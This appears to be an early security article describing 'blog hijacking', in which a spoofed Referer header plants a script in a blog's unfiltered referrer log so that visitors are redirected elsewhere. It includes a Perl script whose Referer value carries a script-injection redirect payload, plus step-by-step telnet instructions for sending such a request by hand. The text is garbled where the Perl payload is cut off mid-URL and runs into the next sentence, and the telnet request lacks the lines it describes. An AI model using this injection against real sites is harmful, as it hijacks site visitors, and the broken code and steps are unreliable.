Rootsecure.net recently came across this post:
http://www.unix-girl.com/blog/archives/000726.html, on how it is
possible to hijack blogs, (along with any other site with similar insecure
scripts) which was the inspiration for this report.
Referrer spoofing is changing the page that the site you
goto thinks you came from, so you're on site A and you click a link on it
taking you to site B. Well your browser will send Site B the location
of the page you were just on (Site A). It has been possible ever since people started using home
grown insecure scripts on their pages (ie ones which do not properly filter
out HTML tags such as < > " ' & ;) however this is the first time Rootsecure.net has ever heard of the new phenomenon of "blog
hijacking©" (spoofing your referrer to a blog so that everyone else
that visits it will be redirected to another blog/site of your choice).
It is usually highly-noticeable because of the fact most blogs display
referrers on the their home page.
The following Perl script can be used for such a purpose:
print "Content-Type: text/html\n\n";
my $url = "http://www.example.com";
use HTTP::Request::Common qw(GET POST);
my $agent = LWP::UserAgent->new;
my $req = GET $url, Referer => "\"></a><script>top.location.href=\'http://wwHowever by far a simpler way is to connect to the website via telnet, which
should be readily available on any respectable computer.
- Open a command windows and type in telnet followed
by the name of the site followed by 80, e.g.
(do not include http://)
- Type the following into the command window (after
changing the host field, and get request) - I
would recommend copying the whole lot into notepad, making the changes,
then copy/pasting it into the command window.
GET /index.pl HTTP/1.1
(Note referrer is all one line, and spelt "Referer")
- Hit enter twice (the one in the middle of the keyboard, not the one on
the number pad)
Note: Other blogs
will have implemented their referrer logging scripts in different ways,
therefore care is needed to properly end/begin HTML tags.
Update: Blog that was originally hijacked -
Roundup of "Blog-Hijacking" -
Further Update: The Register have picked up the story.